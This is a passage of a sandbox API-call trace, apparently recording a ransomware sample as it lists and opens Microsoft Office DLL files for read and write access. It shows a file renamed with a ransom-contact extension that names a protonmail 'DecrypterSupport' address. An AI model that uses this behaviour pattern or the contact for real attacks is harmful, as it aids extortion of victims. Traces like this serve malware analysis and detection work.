Files\\Microsoft Office\\root\\client\\mfc140u.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4b798 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.105] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1f5fb21, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd244aa14, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa12a8, dwReserved0=0x402b87c5, dwReserved1=0x337a4ce3, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0100.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ae18 [0100.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0100.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0100.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.106] AreFileApisANSI () returned 1 [0100.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll", lpUsedDefaultChar=0x0) returned 59 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0100.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.106] AreFileApisANSI () returned 1 [0100.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0100.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll") returned 59 [0100.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.107] GetFileType (hFile=0x418) returned 0x1 [0100.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.107] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.108] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.108] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.108] CloseHandle (hObject=0x418) returned 1 [0100.108] AreFileApisANSI () returned 1 [0100.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0100.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll") returned 59 [0100.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.108] GetFileType (hFile=0x418) returned 0x1 [0100.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.109] CloseHandle (hObject=0x418) returned 1 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.110] AreFileApisANSI () returned 1 [0100.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0100.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll") returned 59 [0100.110] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp120.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp120.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1f5fb21, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd244aa14, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa12a8)) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0100.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.110] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1ea0ff2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1ea0ff2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd20449b3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9b0a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ab20 [0100.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0100.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0100.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.111] AreFileApisANSI () returned 1 [0100.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll", lpUsedDefaultChar=0x0) returned 59 [0100.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0100.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0100.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.111] AreFileApisANSI () returned 1 [0100.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0100.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 59 [0100.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.112] GetFileType (hFile=0x418) returned 0x1 [0100.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.112] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.112] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.112] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.113] CloseHandle (hObject=0x418) returned 1 [0100.113] AreFileApisANSI () returned 1 [0100.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0100.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll") returned 59 [0100.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\msvcp140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.113] GetFileType (hFile=0x418) returned 0x1 [0100.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.113] CloseHandle (hObject=0x418) returned 1 [0100.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.114] RtlAllocateHeap 